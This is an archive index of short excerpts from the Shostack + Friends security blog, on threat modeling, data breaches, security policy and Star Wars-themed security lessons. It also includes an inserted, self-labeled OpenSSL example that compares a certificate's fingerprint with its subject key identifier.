Shostack + Friends Blog Archive

 

Rogue One Sequel already being filmed!

There’s some really interesting leaked photos and analysis by Charles Goodman. “Leaked photos from the Rogue One sequel (Mainly Speculation – Possible Spoilers).”

 

Rogue One: The Best Star Wars Yet?

Someone once asked me why I like Star Wars more than Star Trek. I was a bit taken aback, and he assumed that since I use it so much, I obviously prefer it. The real reason I use Star Wars is not that it’s better, but that there’s a small canon, and I don’t have […]

 

Earthrise

Image credit: Bill Anders, Apollo 8, launched this day, Dec 21, 1968.

 

Yahoo! Yippee? What to Do?

[Dec 20 update: The first draft of this post ended up with both consumer and enterprise advice, which made it complex. The enterprise half is now on the IANS blog: Never Waste a Good Crisis: Yahoo Edition.] Yesterday, Yahoo disclosed that attackers broke into Yahoo in 2013 and stole details on a billion accounts. Brian […]

 

Seeing the Big Picture

This quote from Bob Iger, head of Disney, is quite interesting for his perspective as a leader of a big company: There is a human side to it that I try to apply and consider. [But] the harder thing is to balance with the reality that not everything is perfect. In the normal course of […]

 

Do Games Teach Security?

There’s a new paper from Mark Thompson and Hassan Takabi of the University of North Texas. The title captures the question: Effectiveness Of Using Card Games To Teach Threat Modeling For Secure Web Application Developments Gamification of classroom assignments and online tools has grown significantly in recent years. There have been a number of card […]

 

Incentives, Insurance and Root Cause

Over the decade or so since The New School book came out, there’s been a sea change in how we talk about breaches, and how we talk about those who got breached. We agree that understanding what’s going wrong should be a bigger part of how we learn. I’m pleased to have played some part […]

 

Electoral Chaos

[Dec 15: Note that there are 4 updates to the post with additional links after writing.] The Green Party is driving a set of recounts that might change the outcome in one or more swing states. Simultaneously, there is a growing movement to ask the Electoral College to choose a candidate other than Donald Trump […]

 

Gavle Lessons: 56% Is Not Sufficiently More Secure!

In September, we shared the news that for its 50th year, the people of Gävle paid an extra $100,000 to secure the goat. Sadly, it seems to have not helped. Today, the goat tweeted: Oh no, such a short amount of time with you my friends. The obvious lesson is that the Swedes have a […]

 

Mac Command Line: Turning Apps into Commands

I moved to MacOS X because it offers both a unix command line and graphical interfaces, and I almost exclusively use the command line as I switch between tasks. If you use a terminal and aren’t familiar with the open command, I urge you to take a look. I tend to open documents with open […]

 

Election 2016

This election has been hard to take on all sorts of levels, and I’m not going to write about the crap. Everything to be said has been said, along with much that never should have been said, and much that should disqualify those who said it from running for President. I thought about endorsing Jill […]

 

The Breach Response Market Is Broken (and what could be done)

Much of what Andrew and I wrote about in the New School has come to pass. Disclosing breaches is no longer as scary, nor as shocking, as it was. But one thing we expected to happen was the emergence of a robust market of services for breach victims. That’s not happened, and I’ve been thinking […]

 

Secure Development or Backdoors: Pick One

In “Threat Modeling Crypto Back Doors,” I wrote: In the same vein, the requests and implementations for such back-doors may be confidential or classified. If that’s the case, the features may not go through normal tracking for implementation, testing, or review, again reducing the odds that they are secure. Of course, because such a system […]

 

Current Reading

[Update, Feb 20 2017: More reading: Trump and the ‘Society of the Spectacle’.]

 

Gavle Goat, now 56% more secure!

“We’ll have more guards. We’re going to try to have a ‘goat guarantee’ the first weekend,” deputy council chief Helene Åkerlind, representing the local branch of the Liberal Party, told newspaper Gefle Dagblad. “It is really important that it stays standing in its 50th year,” she added to Arbetarbladet. Gävle Council has decided to allocate […]

 

You say noise, I say data

There is a frequent claim that stock markets are somehow irrational and unable to properly value the impact of cyber incidents in pricing. (That’s not usually precisely how people phrase it. I like this chart of one of the largest credit card breaches in history: It provides useful context as we consider this quote: On […]

 

Why Don't We Have an Incident Repository?

Steve Bellovin and I provided some “Input to the Commission on Enhancing National Cybersecurity.” It opens: We are writing after 25 years of calls for a “NTSB for Security” have failed to result in action. As early as 1991, a National Research Council report called for “build[ing] a repository of incident data” and said “one […]

 

Diagrams in Threat Modeling

When I think about how to threat model well, one of the elements that is most important is how much people need to keep in their heads, the cognitive load if you will. In reading Charlie Stross’s blog post, “Writer, Interrupted” this paragraph really jumped out at me: One thing that coding and writing fiction […]

 

What Boards Want in Security Reporting

Recently, some of my friends were talking about a report by Bay Dynamics, “How Boards of Directors Really Feel About Cyber Security Reports.” In that report, we see things like: More than three in five board members say they are both significantly or very “satisfied” (64%) and “inspired”(65%) after the typical presentation by IT and […]

 

FBI says their warnings were ignored

There are two major parts to the DNC/FBI/Russia story. The first part is the really fascinating evolution of public disclosures over the DNC hack. We know the DNC was hacked, that someone gave a set of emails to Wikileaks. There are accusations that it was Russia, and then someone leaked an NSA toolkit and threatened to […]

 

What does the MS Secure Boot Issue teach us about key escrow?

Nothing. No, seriously. Articles like “Microsoft Secure Boot key debacle causes security panic” and “Bungling Microsoft singlehandedly proves that golden backdoor keys are a terrible idea” draw on words in an advisory to say that this is all about golden keys and secure boot. This post is not intended to attack anyone; researchers, journalists or […]

 

Consultants Say Their Cyber Warnings Were Ignored

Back in October, 2014, I discussed a pattern of “Employees Say Company Left Data Vulnerable,” and it’s a pattern that we’ve seen often since. Today, I want to discuss the consultant’s variation on the story. This is less common, because generally smart consultants don’t comment on the security of their consultees. In this case, it […]

 

"Better Safe than Sorry!"

“Better safe than sorry” are the closing words in a NYT story, “A Colorado Town Tests Positive for Marijuana (in Its Water).” Now, I’m in favor of safety, and there’s a tradeoff being made. Shutting down a well reduces safety by limiting the supply of water, and in this case, they closed a pool, which […]

 

Dear Mr. President

U.S. President Barack Obama says he’s ”concerned” about the country’s cyber security and adds, ”we have to learn from our mistakes.” Dear Mr. President, what actions are we taking to learn from our mistakes? Do we have a repository of mistakes that have been made? Do we have a “capability” for analysis of these mistakes? […]

 

Donald Trump Facts

“My father likes to keep some anonymity. It’s who he is. It’s who he is as a person,” Eric Trump said. It should have been obvious. (Quote from Washington Post, July 6, 2016).

 

What's Classified, Doc? (The Clinton Emails and the FBI)

So I have a very specific question about the “classified emails”, and it seems not to be answered by “Statement by FBI Director James B. Comey on the Investigation of Secretary Hillary Clinton’s Use of a Personal E-Mail System.” A few quotes: From the group of 30,000 e-mails returned to the State Department, 110 […]

 

Happy Independence Day!

Since 2005, this blog has had a holiday tradition of posting “The unanimous Declaration of the thirteen united States of America.” Never in our wildest, most chaotic dreams, did we imagine that the British would one day quote these opening words: When in the Course of human events, it becomes necessary for one people to […]

 

Passwords 2016

I’m excited to see the call for papers for Passwords 2016. There are a few exciting elements. First, passwords are in a category of problems that someone recently called “garbage problems.” They’re smelly, messy, and no one really wants to get their hands dirty on them. Second, they’re important. Despite their very well-known disadvantages, and […]

 

A New Way to Tie Security to Business

As security professionals, sometimes the advice we get is to think about the security controls we deploy as some mix of “cloud access security brokerage” and “user and entity behavioral analytics” and “next generation endpoint protection.” We’re also supposed to “hunt”, “comply,” and ensure people have had their “awareness” raised. Or perhaps they mean “training,” […]

 

The Evolution of Apple’s Differential Privacy

Bruce Schneier comments on “Apple’s Differential Privacy:” So while I applaud Apple for trying to improve privacy within its business models, I would like some more transparency and some more public scrutiny. Do we know enough about what’s being done? No, and my bet is that Apple doesn’t know precisely what they’ll ship, and aren’t […]

 

Security Lessons from C-3PO

C-3PO: Sir, the possibility of successfully navigating an asteroid field is approximately 3,720 to 1. Han Solo: Never tell me the odds. I was planning to start this with a C-3PO quote, and then move to a discussion of risk and risk taking. But I had forgotten just how rich a vein George Lucas tapped […]

 

The Rhetorical Style of Drama

There is a spectre haunting the internet, the spectre of drama. All the powers of the social media have banded together to not fight it, because drama increases engagement statistics like nothing else: Twitter and Facebook, Gawker and TMZ, BlackLivesMatter and GamerGate, Donald Trump and Donald Trump, the list goes on and on. Where is […]

 

"Think Like an Attacker" is an opt-in mistake

I’ve repeatedly spoken out against “think like an attacker.” Now I’m going to argue from authority. In this long article, “The Obama Doctrine,” the President of the United States says “The degree of tribal division in Libya was greater than our analysts had expected.” So let’s think about that statement and what it means. First, […]

 

Humans in Security, BlackHat talks

This is a brief response to Steve Christey Coley, who wrote on Twitter, “but BH CFP reads mostly pure-tech, yet infosec’s more human-driven?” I can’t respond in 140, and so a few of my thoughts, badly organized: BlackHat started life as a technical conference, and there’s certain expectations about topics, content and quality, which have […]

 

RSA Planning

Have a survival kit: ricola, Purell, gatorade, advil and antacids can be brought or bought on site. Favorite talk (not by me): I look forward to Sounil Yu’s talk on “Understanding the Security Vendor Landscape Using the Cyber Defense Matrix.” I’ve seen an earlier version of this, and like the model he’s building a great […]

 

Secure Code is Hard, Let's Make it Harder!

I was confused about why Dan Kaminsky would say CVE-2015-7547 (a bug in glibc’s DNS handling) creates network attack surface for sudo. Chris Rohlf kindly sorted me out by mentioning that there’s now a -host option to sudo, of which I was unaware. I had not looked at sudo in depth for probably 20 years, […]

 

Sneak peeks at my new startup at RSA

Many executives have been trying to solve the problem of connecting security to the business, and we’re excited about what we’re building to serve this important and unmet need. If you present security with an image like the one above, we may be able to help. My new startup is getting ready to show our […]

 

Kale Caesar

According to the CBC: “McDonald’s kale salad has more calories than a Double Big Mac” In a quest to reinvent its image, McDonald’s is on a health kick. But some of its nutrient-enhanced meals are actually comparable to junk food, say some health experts. One of the new kale salads has more calories, fat and sodium […]

 

Superbowls

This is a superb owl, but its feathers are ruffled. It is certainly not a metaphor. Speaking of ruffled feathers, apparently there’s a kerfuffle about Super Bowl 1, where the only extant tape is in private hands, and there’s conflict over what to do with it. One aspect I haven’t seen covered is that 50 […]

 

Threat Modeling: Chinese Edition

I’m excited to say that Threat Modeling: Designing for Security is now available in Chinese. This is a pretty exciting milestone for me — it’s my first book translation, and it joins Elevation of Privilege as my second translation into Chinese. You can buy it from Amazon.cn.

 

Security Blogger Awards

Voting for the 2016 Security Blogger Awards is now open, and this blog is nominated for most entertaining. Please don’t vote for us. Along with our sister blog, we’re aiming to dominate a new category next year, “most nominations without a win.”

 

"The Pentesters Strike Back"

Offered up without comment: Star Wars Episode IV.1.d: The Pentesters Strike Back from CyberPoint International on Vimeo.

 

The Pogues

Happy New Year! The Pogues are launching their own brand of whiskey, and whatever you think of the band or of drinking, it’s hard to think of a more “on brand” product creation than this.

 

Cybersecurity Lessons from Star Wars: Blame Vader, Not the IT Department

In “The Galactic Empire Has Terrible Cybersecurity,” Alex Grigsby looks at a number of high-profile failures, covered in “A New Hope” and the rest of the Star Wars canon. Unfortunately, the approach he takes to the Galactic Empire obscures the larger, more dangerous issue, which is its cybersecurity culture. There are two errors in Grigsby’s analysis, […]

 

Governance Lessons from the Death Star Architect

I had not seen this excellent presentation by the engineer who built the Death Star’s exhaust system. In it, he discusses the need to disperse energy from a battle station with the power draw to destroy planets, and the engineering goals he had to balance. I’m reminded again of “The Evolution of Useful Things” and […]

 

Open Letters to Security Vendors

John Masserini has a set of “open letters to security vendors” on Security Current. Everyone involved in product or sales at a security startup should read them. John provides insight into what it’s like to be pitched by too many startups, and provides a level of transparency that’s sadly hard to find. Personally, I learned […]

 

Phishing and Clearances

Apparently, the CISO of US Homeland Security, a Paul Beckman, said that: “Someone who fails every single phishing campaign in the world should not be holding a TS SCI [top secret, sensitive compartmentalized information—the highest level of security clearance] with the federal government” (Paul Beckman, quoted in Ars technica) Now, I’m sure being in the […]

 

Survey for How to Measure Anything In Cybersecurity Risk

This is a survey from Doug Hubbard, author of How To Measure Anything and he is currently writing another book with Richard Seiersen (GM of Cyber Security at GE Healthcare) titled How to Measure Anything in Cybersecurity Risk. As part of the research for this book, they are asking for your assistance as an information […]

 

What Good is Threat Intelligence Going to do Against That?

As you may be aware, I’m a fan of using Star Wars for security lessons, such as threat modeling or Saltzer and Schroeder. So I was pretty excited to see Wade Baker post “Luke in the Sky with Diamonds,” talking about threat intelligence, and he gets bonus points for crossover title. And I think it’s […]

 

Towards a model of web browser security

One of the values of models is they can help us engage in areas where otherwise the detail is overwhelming. For example, C is a model of how a CPU works that allows engineers to defer certain details to the compiler, rather than writing in assembler. It empowers software developers to write for many CPU […]

 

Adam's new startup

A conversation with an old friend reminded me that there may be folks who follow this blog, but not the New School blog. Over there, I’ve posted “Improving Security Effectiveness” about leaving Microsoft to work on my new company: For the last few months, I’ve been working full time and talking with colleagues about a […]

 

Seeking a technical leader for my new company

We have a new way to measure security effectiveness, and want someone who’ll drive to delivering the technology to customers, while building a great place for developers to ship and deploy important technology. We are very early in the building of the company. The right person will understand such a “green field” represents both opportunity […]

 

The Drama Triangle

As we head into summer conference season, drama is as predictable as vulnerabilities. I’m really not fond of either. What I am fond of, (other than Star Wars), as someone who spends a lot of time thinking about models, is the model of the “drama triangle.” First discussed by Stephen Karpman, the triangle has three […]

 

Security Lessons from Healthcare.gov

There’s a great “long read” at CIO, “6 Software Development Lessons From Healthcare.gov’s Failed Launch.” It opens: This article tries to go further than the typical coverage of Healthcare.gov. The amazing thing about this story isn’t the failure. That was fairly obvious. No, the strange thing is the manner in which often conflicting information is […]

 

On Language

I was irked to see a tweet “Learned a new word! Pseudoarboricity: the number of pseudoforests needed to cover a graph. Yes, it is actually a word and so is pseudoforest.” The idea that some letter combinations are “actual words” implies that others are “not actual words,” and thus, that there is some authority who […]

 

The Web We Have to Save

Hossein Derakhshan was recently released from jail in Iran. He’s written a long and thoughtful article “The Web We Have to Save.” It’s worth reading in full, but here’s an excerpt: Some of it is visual. Yes, it is true that all my posts on Twitter and Facebook look something similar to a personal blog: […]

 

Improving Security Effectiveness

For the last few months, I’ve been working full time and talking with colleagues about a new way for security executives to measure the effectiveness of security programs. In very important ways, the ideas are new and non-obvious, and at the same time, they’re an evolution of the ideas that Andrew and I wrote about […]

 

What Happened At OPM?

I want to discuss some elements of the OPM breach and what we know and what we don’t. Before I do, I want to acknowledge the tremendous and justified distress that those who’ve filled out the SF-86 form are experiencing. I also want to acknowledge the tremendous concern that those who employ those with clearances […]

 

The Unanimous Declaration of the Thirteen United States of America

In CONGRESS, July 4, 1776 The unanimous Declaration of the thirteen united States of America, When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the earth, the separate and equal station to which […]

 

PCI & the 166816 password

This was a story back around RSA, but I missed it until RSnake brought it up on Twitter: “[A default password] can hack nearly every credit card machine in the country.” The simple version is that Charles Henderson of Trustwave found that “90% of the terminals of this brand we test for the first time […]

 

Wassenaar Restrictions on Speech

[There are broader critiques by Katie Moussouris of HackerOne at “Legally Blind and Deaf – How Computer Crime Laws Silence Helpful Hackers” and Halvar Flake at “Why changes to Wassenaar make oppression and surveillance easier, not harder.” This post addresses the free speech issue.] During the first crypto wars, cryptography was regulated under the US […]

 

Threat Modeling Crypto Back Doors

Today, the Open Technology Institute released an open letter to the President of the United States from a broad set of organizations and experts, and I’m pleased to be a signer, and agree wholeheartedly with the text of the letter. (Some press coverage.) I did want to pile on with an excerpt from chapter 9 […]

 

Conference Etiquette: What’s New?

So Bill Brenner has a great article on “How to survive security conferences: 4 tips for the socially anxious.” I’d like to stand by my 2010 guide to “Black Hat Best Practices,” and augment it with something new: a word on etiquette. Etiquette is not about what fork you use (start from the outside, […]

 

Boyd Video: Patterns of Conflict

John Boyd’s ideas have had a deep impact on the world. He created the concept of the OODA Loop, and talked about the importance of speed (“getting inside your opponent’s loop”) and orientation, and how we determine what’s important. A lot of people who know about the work of John Boyd also know that he […]

 

The New Cyber Agency Will Likely Cyber Fail

The Washington Post reports that there will be a “New agency to sniff out threats in cyberspace.” This is my first analysis of what’s been made public. Details are not fully released, but there are some obvious problems, which include: “The quality of the threat analysis will depend on a steady stream of data from […]

 

What CSOs can Learn from Pete Carroll

If you listen to the security echo chamber, after an embarrassing failure like a data breach, you lose your job, right? Let’s look at Seahawks Coach Pete Carroll, who made what the home town paper called the “Worst Play Call Ever.” With less than a minute to go in the Superbowl, and the game hanging […]

 

An Infosec lesson from the "Worst Play Call Ever"

It didn’t take long for the Seahawks’ game-losing pass to get a label. But as Ed Felten explains, there’s actually some logic to it, and one of his commenters (Chris) points out that Marshawn Lynch scored in only one of his 5 runs from the one yard line this season. So, perhaps in a game […]

 

The Unexpected Meanings of Facebook Privacy Disclaimers

Paul Gowder has an interesting post over at Prawfblog, “In Defense of Facebook Copyright Disclaimer Status Updates (!!!).” He presents the facts: …People then decide that, hey, goose, gander, if Facebook can unilaterally change the terms of our agreement by presenting new ones where, theoretically, a user might see them, then a user can unilaterally […]

 

Security 101: Show Your List!

Lately I’ve noted a lot of people quoted in the media after breaches saying “X was Security 101. I can’t believe they didn’t do X!” For example, “I can’t believe that LinkedIn wasn’t salting passwords! That’s security 101!” Now, I’m unsure if that’s “security 101” or not. I think security 101 for passwords is “don’t […]

 

IOS Subject Key Identifier?

I’m having a problem where the “key identifier” displayed on my iOS device does not match the key fingerprint on my server. In particular, I run: % openssl x509 -in keyfile.pem -fingerprint -sha1 and I get a 20 byte hash. I also have a 20 byte hash in my phone, but it is not that […]
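
The excerpt doesn’t say what the mismatch turned out to be, so the following is an added example rather than anything from the original post. One well-known way to end up with two different 20-byte values for the same certificate: a SHA-1 certificate fingerprint hashes the entire DER-encoded certificate, while an X.509 Subject Key Identifier (RFC 5280 §4.2.1.2, method 1) hashes only the public key bits, so the two never agree even when nothing is wrong. The script below generates a throwaway self-signed RSA certificate, computes both values, and recomputes the SKI independently from the public key to show which hash matches which. Assumptions: OpenSSL 1.1.1 or later on the PATH (for `-addext` and `x509 -ext`), an RSA key (for RSA, the subjectPublicKey BIT STRING content is exactly the RSAPublicKey DER, which is why `-RSAPublicKey_out` is used), and the made-up subject `ski-demo.example` and temporary file names.

```shell
#!/bin/sh
# Added example (not from the post): certificate fingerprint vs. Subject Key
# Identifier. Both are 20-byte SHA-1 values, but they hash different inputs.
set -e

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Throwaway self-signed RSA certificate with an explicit SKI extension.
# (-addext requires OpenSSL 1.1.1 or later.) Subject name is made up.
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -subj "/CN=ski-demo.example" \
  -addext "subjectKeyIdentifier=hash" \
  -keyout "$WORK/key.pem" -out "$WORK/cert.pem" >/dev/null 2>&1

# 1. Certificate fingerprint: SHA-1 over the DER encoding of the whole
#    certificate. This is what `openssl x509 -fingerprint -sha1` prints
#    (there shown uppercase with colons); lowercase hex here for comparison.
cert_fingerprint() {
  openssl x509 -in "$WORK/cert.pem" -outform DER \
    | openssl dgst -sha1 | sed 's/.*= //'
}

# 2. SKI as stored in the certificate's subjectKeyIdentifier extension,
#    colons stripped and lowercased so it can be compared as plain hex.
cert_ski() {
  openssl x509 -in "$WORK/cert.pem" -noout -ext subjectKeyIdentifier \
    | tail -n 1 | tr -d ' :' | tr 'A-F' 'a-f'
}

# 3. SKI recomputed independently (RFC 5280 method 1): SHA-1 over the value
#    of the subjectPublicKey BIT STRING. For an RSA key that value is the
#    DER RSAPublicKey structure, which `-RSAPublicKey_out` emits.
pubkey_sha1() {
  openssl x509 -in "$WORK/cert.pem" -noout -pubkey \
    | openssl rsa -pubin -RSAPublicKey_out -outform DER 2>/dev/null \
    | openssl dgst -sha1 | sed 's/.*= //'
}

# Returns "differ" when the fingerprint and SKI disagree but the SKI matches
# the hash of the public key, i.e. the expected, harmless situation.
classify() {
  fp=$(cert_fingerprint); ski=$(cert_ski); pk=$(pubkey_sha1)
  if [ "$ski" = "$pk" ] && [ "$fp" != "$ski" ]; then
    echo differ
  else
    echo unexpected
  fi
}

echo "cert fingerprint (sha1 over DER cert): $(cert_fingerprint)"
echo "subjectKeyIdentifier from extension:   $(cert_ski)"
echo "sha1 over subjectPublicKey bits:       $(pubkey_sha1)"
echo "result: $(classify)"
```

If the value on a device matches the third line rather than the first, the device is showing the key identifier, not the certificate fingerprint, and there is no mismatch to chase; if it matches neither, compare against the actual certificate the device holds, since a different certificate (for example, one from a CA chain) will of course hash to a different value.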

 

Color-Changing Cats

Looking for something festive, holiday-like and chaotic for the blog, I came across color-changing cats. The history of color-changing cats is a fascinating one, involving Carl Sagan and accurate predictions of unfathomable chaos over the next ten thousand years. Because while we don’t know what life will be like that far in the future, consider […]

 

The Cliffs of Insanity!

Today’s “the future is cool” entry is the cliffs of insanity: Actually, I’m lying to you, they’re the Cliffs of Comet Churyumov–Gerasimenko, as photographed by the Rosetta spacecraft. I just think it’s cool how similar they look, and how the physical processes which created the Cliffs of Moher may also have been at work on a […]

 

The Future Is So Cool

When you were growing up, 2014 was the future. And it’s become cliche to bemoan that we don’t have the flying cars we were promised, but did get early delivery on a dystopian surveillance state. So living here in the future, I just wanted to point out how cool it is that you can detect […]

 

Security Lessons from Drug Trials

When people don’t take their drugs as prescribed, it’s for very human reasons. Typically they can’t tolerate the side effects, the cost is too high, they don’t perceive any benefit, or they’re just too much hassle. Put these very human (and very subjective) reasons together, and they create a problem that medicine refers to as […]

 

Hate-watching, breaking and building

Listening to the radio, there was a discussion of how the folks at NBC were worried that people were going to “hatewatch” their new version of Peter Pan. Hatewatch. Like it’s a word. It’s fascinating. They discussed how people wanted to watch it to tweet cynically at its expense. The builder/breaker split isn’t just present […]

 

Chaos and Legitimacy

At BruCon 0x06, I was awoken from a nap to the sound of cannons, and looked out my window to see soldiers marching through the streets. It turns out they were celebrating the 200th anniversary of the Treaty of Ghent. As I’m sure you’ll recall from history class Wikipedia, the Treaty of Ghent ended the […]

 

Threat Modeling At a Startup

I’ve been threat modeling for a long time, and at Microsoft, had the lovely opportunity to put some rigor into not only threat modeling, but into threat modeling in a consistent, predictable, repeatable way. Because I did that work at Microsoft, sometimes people question how it would work for a startup, and I want to […]

 

Think Like An Attacker? Flip that advice!

For many years, I have been saying that “think like an attacker” is bad advice for most people. For example: Here’s what’s wrong with think like an attacker: most people have no clue how to do it. They don’t know what matters to an attacker. They don’t know how an attacker spends their day. They […]

 

Modeling Attackers and Their Motives

There are a number of reports out recently, breathlessly presenting their analysis of one threatening group of baddies or another. You should look at the reports for facts you can use to assess your systems, such as filenames, hashes and IP addresses. Most readers should, at most, skim their analysis of the perpetrators. Read on […]

 

Phone Booths

This is a lovely little story about pay phones on Whidbey Island. Warning: those who spent too much time with phone systems in their youth may feel inexplicable nostalgia.

 

Thanks, Bruce!

Bruce Schneier says nice things about my latest book.

 

Employees Say Company Left Data Vulnerable

There’s a recurring theme in data breach stories: The risks were clear to computer experts inside $organization: The organization, they warned for years, might be easy prey for hackers. But despite alarms as far back as 2008, $organization was slow to raise its defenses, according to former employees. The particular quote is from “Ex-Employees Say […]

 

Jolt Award for Threat Modeling

I am super-pleased to report that Threat Modeling: Designing for Security has been named a Jolt Finalist, the first security-centered book to make that list since Schneier’s Secrets and Lies in 2001. My thanks to the judges, most especially to Gastón Hillar for the constructive criticism that “Unluckily, the author has chosen to focus on […]

 

BSides LV: Change Industry Or Change Professionals?

All through the week of BSides/BlackHat/Defcon, people came up to me to tell me that they enjoyed my BSides Las Vegas talk. (Slides, video). It got some press coverage, including an article by Jon Evans of TechCrunch, “Notes From Crazytown, Day One: The Business Of Fear.” Mr. Evans raises an interesting point: “the computer security […]

 

CERT, Tor, and Disclosure Coordination

There’s been a lot said in security circles about a talk on Tor being pulled from Blackhat. (Tor’s comments are also worth noting.) While that story is interesting, I think the bigger story is the lack of infrastructure for disclosure coordination. Coordinating information about vulnerabilities is a socially important function. Coordination makes it possible for […]

 

#Apollo45

July 20, 1969. I’ve blogged about it before. There are people who can write eloquently about events of such significance. I am not one of them. I hope that doesn’t stand in the way of folks remembering the amazing accomplishment that the Apollo program was.

 

Etsy's Threat Modeling

Gabrielle Gianelli has pulled back the curtain on how Etsy threat modeled a new marketing campaign. (“Threat Modeling for Marketing Campaigns.”) I’m really happy to see this post, and the approach that they’ve taken: First, we wanted to make our program sustainable through proactive defenses. When we designed the program we tried to bake in […]

 

Mail Chaos

The mail system I’ve been using for the last 19 years is experiencing what one might call an accumulation of chaos, and so I’m migrating to a new domain, shostack.org. You can email me at my firstname@shostack.org, and my web site is now at http://adam.shostack.org I am sorry for any inconvenience this may cause. [Update: […]

 

What Security Folks Can Learn from Doctors

Stefan Larsson talks about “What doctors can learn from each other:” Different hospitals produce different results on different procedures. Only, patients don’t know that data, making choosing a surgeon a high-stakes guessing game. Stefan Larsson looks at what happens when doctors measure and share their outcomes on hip replacement surgery, for example, to see which […]

 

Seattle event: Ada's Books

For Star Wars day, I’m happy to share this event poster for my talk at Ada’s Books in Seattle Technical Presentation: Adam Shostack shares Threat Modeling Lessons with Star Wars. This will be a less technical talk with plenty of discussion and interactivity, drawing on some of the content from “Security Lessons from Star Wars,” […]

 

Threat Modeling: The East Coast Book Tour

I’m planning to be on the East Coast from June 16-27, giving threat modeling book talks. (My very popular “Threat Modeling Lessons from Star Wars.”) I’m reaching out to find venues which would like me to come by and speak. My plan is to arrive in Washington DC on the 16th, and end in Boston, […]

 

There's more than one way to threat model

Today, most presentations on threat modeling talk about each phase of the process. They talk about how to model what you’re building, what can go wrong, and what to do about it. Those tightly coupled processes can be great if you’ve never heard of an approach to threat modeling. But they can add to the […]

 

Threat modeling the Dread Pirate Roberts way

It has to be said that no one in the Princess Bride is great at threat modeling. But one scene in particular stands out. It’s while they’re planning to attack the castle and rescue Buttercup: Westley: I mean, if we only had a wheelbarrow, that would be something. Inigo: Where we did we put that […]

 

Virtual assistant services?

I’m getting ready to announce an East coast book tour. In planning my Silicon Valley tour, I learned that between scheduling, getting the details needed out, making sure I knew where I was sleeping, there was a large amount of administrative work involved. So I’d like to hire someone to take care of all that […]

 

Threat Modeling & Devops: Like Peanut Butter & Jelly

George Hulme interviewed me for Devops.com, and the article is at “Q&A: Speaking DevOps and Threat Modeling.” It’s obvious that devops is an important trend, and it’s important to understand how to align threat modeling to that world.

 

Should I Start Threat Modeling from Assets?

A couple of reviewers have commented that they have different perspective on assets. For example, in a review I very much appreciated, Gunnar Peterson says: I have slightly a different perspective on Shostack’s view on assets. The book goes into different views that launch the threat model, the approach advocated for in the book is […]

 

L'Academie Gawker

Via Poynter, we learn that the word “massive” has been banned on Gawker. We want to sound like regular adult human beings, not Buzzfeed writers or Reddit commenters,” new Gawker Editor Max Read says in a memo to the publication’s writers. Words like “epic,” “pwn” and “derp” are no longer welcome on the site. Read […]

 

RSA: Time for some cryptographic dogfood

One of the most effective ways to improve your software is to use it early and often.  This used to be called eating your own dogfood, which is far more evocative than the alternatives. The key is that you use the software you’re building. If it doesn’t taste good to you, it’s probably not customer-ready.  […]

 

Threat Modeling and Operations

One very important question that’s frequently asked is “what about threat modeling for operations?” I wanted to ensure that Threat Modeling: Designing for Security focused on both development and operations. To do that, I got help from Russ McRee. For those who don’t know Russ, he’s a SANS incident handler as well as a colleague […]

 

My Technical Editor: Chris Wysopal

When Wiley asked me about a technical editor for Threat Modeling: Designing for Security, I had a long list of requirements. I wanted someone who could consider the various scenarios where threat modeling is important, including software development and operations. I wanted someone who understood the topic deeply, and had the experience of teaching threat […]

 

Threat Modeling: Designing for Security

I am super-excited to announce that my new book, Threat Modeling: Designing for Security (Wiley, 2014) is now available wherever fine books are sold! The official description: If you’re a software developer, systems manager, or security professional, this book will show you how to use threat modeling in the security development lifecycle and the overall […]

 

P0wned! Don't make the same mistake I did

I fell victim to an interesting attack, which I am recounting here so that others may avoid it. In a nutshell, I fell victim to a trojan, which the malefactor was able to place in a trusted location in my search path. A wrapper obscured the malicious payload. Additionally, a second line of defense did […]

 

On Bitcoin

There’s an absolutely fascinating interview with Adam Back: “Let’s Talk Bitcoin Adam Back interview.” For those of you who don’t know Adam, he created Hashcash, which is at the core of Bitcoin proof of work. Two elements I’d like to call attention to in particular are: First, there’s an interesting contrast between Adam’s opinions and […]

 

Adam’s Mailing List and Commitment Devices

Yesterday, I announced that I’ve set up a mailing list. You may have noticed an unusual feature to the announcement: a public commitment to it being low volume, with a defined penalty ($1,000 to charity) for each time I break the rule. You might even be wondering why I did that. In the New School, […]

 

Getting Ready for a Launch

I’m getting ready to announce a new project that I’ve been working on for quite a while. As I get ready, I was talking to friends in PR and marketing, and they were shocked and appalled that I don’t have a mailing list. It was a little like telling people in security that you […]

 

Please vote for the social security blogger awards!

Alan Shimmy has the nominations for the 2014 Social Security bloggers award! New School has been nominated for most entertaining, while Emergent Chaos has been nominated for best representing the security industry and the hall of fame.

 

Please vote for the social security blogger awards!

Alan Shimmy has the nominations for the 2014 Social Security bloggers award! New School has been nominated for most entertaining, while Emergent Chaos has been nominated for best representing the security industry and the hall of fame. Now, I have no idea what it means that Emergent Chaos would represent the security industry. I’m hopeful […]

 

The Worst User Experience In Computer Security?

I’d like to nominate Xfinity’s “walled garden” for the worst user experience in computer security. For those not familiar, Xfinity has a “feature” called “Constant Guard” in which they monitor your internet for (I believe) DNS and IP connections for known botnet command and control services. When they think you have a bot, you see […]

 

Workshop on the Economics of Information Security (WEIS)

The 13th annual Workshop on the Economics of Information Security will be held at Penn State June 23-24, and the call for papers is now open. I’m on the program committee this year, and am looking forward to great submissions.

 

Transparency: When Security Pros Get Popped

Rich Mogul over at Securosis (N.B. I’m a contributing analyst there) has a great post on how, due to human error, some of his AWS credentials got nabbed by some miscreants and abused. We here at the New School love it when folks share how they were compromised and what they did about it. It […]

 

What's Copyright, Doc?

I blogged yesterday about all the new works that have entered the public domain as their copyright expired in the United States. If you missed it, that’s because exactly nothing entered the public domain yesterday. Read more — but only commentary, because there’s no newly free work — at “What Could Have Entered the Public […]

 

What to do for randomness today?

In light of recent news, such as “FreeBSD washing Intel-chip randomness” and “alleged NSA-RSA scheming,” what advice should we give engineers who want to use randomness in their designs? My advice for software engineers building things used to be to rely on the OS to get it right. That defers the problem to a small […]

 

Gavle Goat Goes Later This Year

The Gavle Goat has burned again, according to The Local.Se, and of course, its Twitter account (yet one more way in which real name policies inhibit natural behavior). Two quick comments. First, the goat survived longer this year than usual. Second, I think it illustrates something. I’m not sure what. But my yule would be […]

 

What Price Privacy, Paying For Apps edition

